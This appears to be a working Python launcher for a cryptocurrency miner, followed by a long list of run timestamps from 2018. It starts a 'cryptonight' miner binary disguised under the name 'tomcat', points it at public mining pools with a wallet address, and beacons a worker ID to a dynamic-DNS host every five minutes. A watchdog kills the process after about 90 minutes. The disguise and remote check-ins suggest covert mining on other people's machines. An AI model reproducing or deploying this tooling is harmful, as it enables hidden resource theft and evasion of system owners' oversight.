import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:27:05.426991
#2018-02-17 16:14:01.811274
#2018-02-17 18:01:07.592689
#2018-02-17 19:50:01.692795
#2018-02-17 21:37:07.501951
#2018-02-17 23:21:05.050880
#2018-02-18 01:11:04.958165
#2018-02-18 02:58:06.340839
#2018-02-18 04:46:04.255711
#2018-02-18 06:37:07.088302
#2018-02-18 08:26:05.234205
#2018-02-18 10:13:06.257105
#2018-02-18 11:59:06.466871
#2018-02-18 13:45:08.577763
#2018-02-18 15:34:04.146406
#2018-02-18 17:22:01.876979
#2018-02-18 19:11:03.980559
#2018-02-18 20:57:05.208502
#2018-02-18 22:44:04.137762
#2018-02-19 00:33:03.622254
#2018-02-19 02:18:05.520000
#2018-02-19 04:05:01.320251
#2018-02-19 05:49:04.319146
#2018-02-19 07:38:01.337195
#2018-02-19 09:27:06.157210
#2018-02-19 11:16:07.375520
#2018-02-19 13:04:06.412841
#2018-02-19 14:52:09.262973
#2018-02-19 16:40:10.949054
#2018-02-19 18:27:07.358033
#2018-02-19 20:13:04.180167
#2018-02-19 22:03:04.076830
#2018-02-19 23:48:08.176030
#2018-02-20 01:35:03.182203
#2018-02-20 03:23:01.679490
#2018-02-20 05:10:01.900845
#2018-02-20 06:53:07.556719
#2018-02-20 08:40:06.802645
#2018-02-20 10:24:07.727280
#2018-02-20 12:09:08.780563
#2018-02-20 13:56:04.903197
#2018-02-20 15:41:06.361627
#2018-02-20 17:26:06.766980
#2018-02-20 19:15:09.644881
#2018-02-20 21:03:05.687941
#2018-02-20 22:49:07.935181
#2018-02-21 00:33:05.464638
#2018-02-21 02:19:07.687062
#2018-02-21 04:06:07.839987
#2018-02-21 05:53:05.011661
#2018-02-21 07:41:07.429370
#2018-02-21 09:26:08.429709
#2018-02-21 11:15:09.542336
#2018-02-21 13:03:05.177475
#2018-02-21 14:50:11.093881
#2018-02-21 16:37:09.568016
#2018-02-21 18:28:08.803020
#2018-02-21 20:15:01.539993
#2018-02-21 22:05:07.445877
#2018-02-21 23:51:08.489745
#2018-02-22 01:43:08.457059
#2018-02-22 03:33:03.995778
#2018-02-22 05:19:04.066688
#2018-02-22 07:04:06.205188
#2018-02-22 08:50:09.330950
#2018-02-22 10:38:01.277167
#2018-02-22 12:25:02.612086
#2018-02-22 14:10:04.888220
#2018-02-22 15:57:01.836416
#2018-02-22 17:45:10.070267
#2018-02-22 19:33:05.283159
#2018-02-22 21:25:06.653255
#2018-02-22 23:11:06.958346
#2018-02-23 00:57:06.901016
#2018-02-23 02:44:02.176534
#2018-02-23 04:32:01.836974
#2018-02-23 06:18:04.334665
#2018-02-23 08:04:06.406683
#2018-02-23 10:19:05.841733
#2018-02-23 12:11:08.606368
#2018-02-23 13:58:11.430113
#2018-02-23 15:51:09.756830
#2018-02-23 17:36:07.943729
#2018-02-23 19:24:05.324090
#2018-02-23 21:09:04.236184
#2018-02-23 22:54:07.287914
#2018-02-24 00:41:01.410324
#2018-02-24 02:31:05.951721
#2018-02-24 04:25:01.685695
#2018-02-24 06:11:02.105162
#2018-02-24 07:58:05.200832
#2018-02-24 09:41:06.060026
#2018-02-24 11:37:06.492823
#2018-02-24 13:27:04.104378
#2018-02-24 15:16:05.115235
#2018-02-24 17:05:07.878333
#2018-02-24 18:56:06.939502
#2018-02-24 20:43:06.097110
#2018-02-24 22:54:07.531227
#2018-02-25 02:13:05.809065
#2018-02-25 05:45:03.590642
#2018-02-25 11:37:06.732106